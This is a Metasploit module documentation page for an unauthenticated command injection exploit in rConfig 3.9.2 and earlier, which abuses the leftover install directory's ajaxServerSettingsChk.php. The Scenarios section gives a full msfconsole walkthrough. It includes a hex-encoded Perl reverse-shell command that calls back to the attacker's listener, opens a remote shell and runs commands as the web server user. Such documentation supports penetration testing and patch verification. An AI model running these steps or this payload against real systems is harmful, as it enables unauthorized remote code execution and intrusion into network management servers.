adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
6d9d9a70d410cc94de4d3d9afd7a75cd426d43be
metasploit-gs/documentation/modules/exploit/unix/webapp/rconfig_install_cmd_exec.md
T
cgranleese-r7 adff497bd2 Updates msf5 as well
2025-07-17 11:51:29 +01:00

3.4 KiB
Raw Blame History

Description

This module exploits an unauthenticated command injection vulnerability in rConfig versions 3.9.2 and prior. The install directory is not automatically removed after installation, allowing unauthenticated users to execute arbitrary commands via the ajaxServerSettingsChk.php file as the web server user.

Vulnerable Software

This module has been tested successfully on rConfig version 3.9.2 on CentOS 7.7.1908 (x64).

Verification Steps

  1. Start msfconsole
  2. Do: use exploit/unix/webapp/rconfig_install_cmd_exec
  3. Do: set rhosts <IP>
  4. Do: run
  5. You should get a new session

Options

TARGETURI

The base path to rConfig install directory (default: /install/)

Scenarios

msf > use exploit/unix/webapp/rconfig_install_cmd_exec 
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set rhosts 172.16.191.131
rhosts => 172.16.191.131
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set verbose true
verbose => true
msf exploit(unix/webapp/rconfig_install_cmd_exec) > check

[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[+] 172.16.191.131:443 - The target is vulnerable.
msf exploit(unix/webapp/rconfig_install_cmd_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)
   1   Automatic (Linux Dropper)


msf exploit(unix/webapp/rconfig_install_cmd_exec) > set target 0
target => 0
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(unix/webapp/rconfig_install_cmd_exec) > set lhost 172.16.191.165 
lhost => 172.16.191.165
msf exploit(unix/webapp/rconfig_install_cmd_exec) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Executing command: id
[*] Response: uid=48(apache) gid=48(apache) groups=48(apache)
[*] Executing command: /bin/echo -ne '\x70\x65\x72\x6c\x20\x2d\x4d\x49\x4f\x20\x2d\x65\x20\x27\x24\x70\x3d\x66\x6f\x72\x6b\x3b\x65\x78\x69\x74\x2c\x69\x66\x28\x24\x70\x29\x3b\x66\x6f\x72\x65\x61\x63\x68\x20\x6d\x79\x20\x24\x6b\x65\x79\x28\x6b\x65\x79\x73\x20\x25\x45\x4e\x56\x29\x7b\x69\x66\x28\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x7e\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x24\x45\x4e\x56\x7b\x24\x6b\x65\x79\x7d\x3d\x24\x31\x3b\x7d\x7d\x24\x63\x3d\x6e\x65\x77\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x28\x50\x65\x65\x72\x41\x64\x64\x72\x2c\x22\x31\x37\x32\x2e\x31\x36\x2e\x31\x39\x31\x2e\x31\x36\x35\x3a\x34\x34\x34\x34\x22\x29\x3b\x53\x54\x44\x49\x4e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x72\x29\x3b\x24\x7e\x2d\x3e\x66\x64\x6f\x70\x65\x6e\x28\x24\x63\x2c\x77\x29\x3b\x77\x68\x69\x6c\x65\x28\x3c\x3e\x29\x7b\x69\x66\x28\x24\x5f\x3d\x7e\x20\x2f\x28\x2e\x2a\x29\x2f\x29\x7b\x73\x79\x73\x74\x65\x6d\x20\x24\x31\x3b\x7d\x7d\x3b\x27'|sh
[*] Command shell session 1 opened (172.16.191.165:4444 -> 172.16.191.131:35004) at 2019-10-29 11:48:59 -0400

id
uid=48(apache) gid=48(apache) groups=48(apache)
uname -a
Linux localhost.localdomain 3.10.0-1062.4.1.el7.x86_64 #1 SMP Fri Oct 18 17:15:30 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
pwd
/home/rconfig/www/install/lib/ajaxHandlers
^C
Abort session 1? [y/N]  y
""

[*] 172.16.191.131 - Command shell session 1 closed.  Reason: User exit
msf exploit(unix/webapp/rconfig_install_cmd_exec) >
Reference in New Issue View Git Blame Copy Permalink